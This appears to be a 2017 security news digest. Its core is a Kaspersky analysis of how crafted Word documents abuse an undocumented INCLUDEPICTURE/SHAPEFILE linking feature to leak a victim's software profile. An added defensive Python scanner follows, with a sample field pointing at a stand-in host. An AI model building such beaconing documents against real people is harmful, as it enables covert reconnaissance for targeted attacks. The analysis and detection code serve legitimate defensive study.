Viruses and Worms

Over 2 million users were running a compromised CCleaner!

VIRY.CZ - 19 September 2017 - 09:12

If you use the CCleaner application to "clean up" your hard disk and your antivirus has suddenly flagged it as malware, it is most likely not a false alarm!

Piriform Ltd., the maker of the popular CCleaner tool, became the target of an attack, and CCleaner became the host of a backdoor, i.e. malware capable of stealing data from users. Around 2.7 million users (myself included) unknowingly downloaded the affected version. If the user does not hear about it from the media, they will probably find out the next time they launch CCleaner, when there is a good chance the antivirus will speak up and ruthlessly destroy ccleaner.exe like any other malware (this is how antiviruses react according to Also my case

Category: Viruses and Worms

Pirate Bay digs itself a new hole: Mining alt-coin in slurper browsers

The Register - Anti-Virus - 19 September 2017 - 08:02
Would you trade your CPU time and electricity bill for pirated content?

Bittorrent search engine and mortal enemy of intellectual property lawyers, The Pirate Bay, has upset the one group of people that actually likes it: its users.…


Sexploitation gang thrown in clink for 171 years after 'hunting' kids online and luring them in front of webcams

The Register - Anti-Virus - 19 September 2017 - 02:16
Youngsters tricked into performing sex acts for pervs

Four men have joined their two accomplices behind bars for tricking young girls into performing sex acts online so they could film them.…


Someone checked and, yup, you can still hijack Gmail, Bitcoin wallets etc via dirty SS7 tricks

The Register - Anti-Virus - 19 September 2017 - 01:37
Two-factor authentication by SMS? More like SOS

Once again, it's been demonstrated that vulnerabilities in cellphone networks can be exploited to intercept one-time two-factor authentication tokens in text messages.…


Attackers Use Undocumented MS Office Feature to Leak System Profile Data - 18 September 2017 - 22:33
An undocumented Microsoft Office feature allows for spying via specially crafted Word documents—no macros, exploits or any other active content needed.

DRM now a formal Web recommendation after protest vote fails

The Register - Anti-Virus - 18 September 2017 - 20:51
W3C lays out the case for anti-piracy, anti-copying defenses

Anti-piracy and anti-copying protections are now formally part of the World Wide Web after an effort to vote down content controls at the WWW's standards body failed.…


DOJ lets itself off the privacy hook

Sophos Naked Security - 18 September 2017 - 20:40
The Department of Justice has excused its insider threat database from multiple provisions of the 1974 Privacy Act

Pirate Bay Spotted Hosting Monero Cryptocurrency Miner - 18 September 2017 - 20:19
A cryptocurrency miner surfaced on The Pirate Bay for a day over the weekend.

Chrome to brand FTP as “not secure”

Sophos Naked Security - 18 September 2017 - 19:13
With the release of Chrome 63 in December 2017 FTP will be branded "not secure"

Downloaded CCleaner lately? Oo, awks... it was stuffed with malware

The Register - Anti-Virus - 18 September 2017 - 15:46
OK, OK, well the 2.27 million victims were not Reg readers

Antivirus firm Avast has admitted inadvertently distributing a trojanised version of CCleaner, a popular PC tune-up tool, for nearly a month, infecting an estimated 2.27 million users.…


TfL hackathon showed data can keep transport running and people safe

The Register - Anti-Virus - 18 September 2017 - 15:19
Analytics is about the journey AND destination

Sponsored: If software is eating the world, then hackathons are its fast-food restaurants. Groups of developers come together for short periods to try to solve pressing problems. This happens in sectors from healthcare to retail, and now it's happening in transportation too.…


Malicious CCleaner update points to a major weakness in our infrastructure

Virus Bulletin News - 18 September 2017 - 12:14
Researchers from Cisco Talos have found that a recent version of the widely used CCleaner tool installed malware on the machine.


An (un)documented Word feature abused by attackers

Kaspersky Securelist - 18 September 2017 - 11:00

A little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came across spear phishing emails that had some interesting documents attached to them. They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.

What did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first needs to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information about them. In particular, they need to know the operating system version and the version of some applications on the victim computer, so they can send it the appropriate exploit.

In this specific case, the document looked like this:

There’s nothing suspicious about it at first glance – just a few tips about how to use Google search more effectively. The document contains no active content, no VBA macros, embedded Flash objects or PE files. However, when the user opens the document, Word sends the following GET request to one of the internal links. So we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and obtained the following:

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed. We decided to examine why Office followed that link, and how these links can be identified in documents.

Inside a Word document

The first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the suspicious links. However, as can be seen, that is not the link that Word addresses.

As a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this document. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no formatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a specific way; for example, it is thanks to these fields that we can see active links to other pages of the document, URL links, etc. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text. The 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description begins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

The separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.

The link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode, so Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box) which indicates to the word processor that an image should be inserted at this point. The question is: how do we find this image?

The characters and groups of characters within the text also possess properties; just like fields, these properties are responsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The properties of characters are stored in a two-level table within document streams under the names ‘xTable’ and ‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this analysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:

This is the byte sequence with the picture placeholder 0x14 0x01 0x15. In the actual document, these bytes are located at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character offsets are specified relative to its beginning.

The properties of the group of characters CP[2] indicate that an image is attached to them that is located in the Data stream at offset 0:

1FEF: prop[0]: 6A03 CPicLocation
1FF1: value[0]: 00000000 ; character = 14

We arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value – this means the image should be located in the Data stream at the appropriate offset. If this value were different, then it would have been necessary to look for the image in a different place or ignore this property.

This is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field. This is all there is:

0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section

Standard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no description of what the data that follows it may mean, and how it should be interpreted. This was the main problem in understanding what was actually happening.

So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:

However, this is just an object name, so this link is not used in any way. While investigating this form further, let’s look at the flags field (in the red box):

The value 0x0000000E resolves into a combination of three flags:

  • msoblipflagURL 0x00000002
  • msoblipflagDoNotSave 0x00000004
  • msoblipflagLinkToFile 0x00000008

This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.
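The two pieces of structure the article has walked through so far, the field grammar in the WordDocument text (Begin 0x13, Sep 0x14, End 0x15, with the 0x14 0x01 0x15 picture placeholder) and the msoblip flag bits on the shape, can be turned into a small triage script. The script below is an added example and not code from the Securelist article or from Kaspersky; its function names, the constructed sample text and the placeholder URL are assumptions, and it deliberately stops at the WordDocument text (reading the Data stream shape is a separate step).

```python
import re
# Field delimiters in the WordDocument text ([MS-DOC]): Field = <Begin> *<Field> [Sep] *<Field> <End>
BEGIN, SEP, END = 0x13, 0x14, 0x15
# Shape flag bits from [MS-ODRAW] that the article lists for the value 0x0000000E
MSOBLIP_FLAGS = {0x02: "msoblipflagURL", 0x04: "msoblipflagDoNotSave", 0x08: "msoblipflagLinkToFile"}
URL_RE = re.compile(r"(?:https?|ftp|file)://[^\s\"'<>]+", re.IGNORECASE)

def parse_fields(text):
    """Return (instruction, result) byte pairs for every field, nested ones included."""
    fields = []
    def parse_one(i):  # text[i] is BEGIN; returns the index just past the matching END
        parts, side, i = [bytearray(), bytearray()], 0, i + 1
        while i < len(text):
            b = text[i]
            if b == BEGIN:  # nested field: parsed and recorded on its own
                i = parse_one(i)
            elif b == SEP and side == 0:
                side, i = 1, i + 1  # switch from instruction to result
            elif b == END:
                fields.append((bytes(parts[0]), bytes(parts[1])))
                return i + 1
            else:
                parts[side].append(b)
                i += 1
        raise ValueError("unterminated field")
    i = 0
    while i < len(text):
        i = parse_one(i) if text[i] == BEGIN else i + 1
    return fields

def extract_urls(raw):
    # Dropping NULs also exposes UTF-16LE links, which Word ignores but an analyst should not
    return sorted(set(URL_RE.findall(raw.replace(b"\x00", b"").decode("latin-1"))))

def scan_includepicture(text):
    """For each INCLUDEPICTURE field: its URLs, and whether the result side is the lone 0x01
    byte (the 0x14 0x01 0x15 placeholder), meaning the real picture, and its own URL, is a
    linked shape in the Data stream that must be inspected separately."""
    report = []
    for instr, result in parse_fields(text):
        if instr.replace(b"\x00", b"").strip().split(b" ")[0].upper() == b"INCLUDEPICTURE":
            report.append({"urls": extract_urls(instr), "picture_in_data_stream": result == b"\x01"})
    return report

def decode_blip_flags(value):
    """Expand a shape flags word such as 0x0000000E into [MS-ODRAW] flag names."""
    return [name for bit, name in sorted(MSOBLIP_FLAGS.items()) if value & bit]

# Constructed sample (not the real document's bytes): a UTF-16LE link inside the
# instruction, then the 0x14 0x01 0x15 placeholder the article describes.
SAMPLE_TEXT = (b"Tips for better Google searches.\r\x13INCLUDEPICTURE \""
               + "http://evil-placeholder.test/profile.php".encode("utf-16-le")
               + b"\" \\d\x14\x01\x15Use quotes for exact phrases.")
```

A hit with `picture_in_data_stream` set is the cue to follow the CPicLocation property into the Data stream and check the shape's flags and URL, which is where the link Word actually fetches lives.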

If we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:

We should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in Microsoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in LibreOffice or OpenOffice, the malicious link is not called.

This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks.

Kaspersky Lab’s security products are able to detect when the technique described in this article is used in Microsoft Word documents, and to find links embedded in a document using the same technique.

Monday review – the hot 24 stories of the week

Sophos Naked Security - 18 September 2017 - 10:04
From Equifax's feeble PINs putting frozen credit files at risk and 4 steps to secure yourself to the latest updates on the breach, and more

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down

The Register - Anti-Virus - 18 September 2017 - 00:35
Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.…


Vevo hacked, 3.12 TB of data leaked

Sophos Naked Security - 17 September 2017 - 20:01
The hacking group OurMine says it leaked the data after being told "f*ck off, you don't have anything"

Rogue WordPress Plugin Allowed Spam Injection - 15 September 2017 - 21:54
A rogue version of the WordPress plugin called "Display Widgets" allowed third parties to inject spam advertising content into victims' sites.

Equifax UK admits: 400,000 Brits caught up in mega-breach

The Register - Anti-Virus - 15 September 2017 - 21:39
UK dedicated systems not affected

Equifax UK has surfaced to say that British systems were not affected by a recently disclosed megahack; however, 400,000 UK people were affected due to a "process failure."…


Equifax mega-breach: Security bod flags header config conflict

The Register - Anti-Virus - 15 September 2017 - 20:05
Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.…


VMware Patches Bug That Allows Guest to Execute Code on Host - 15 September 2017 - 17:51
Users who run four different types of VMware products, ESXi, vCenter Server, Fusion and Workstation, are being encouraged to update to address a series of vulnerabilities, one critical.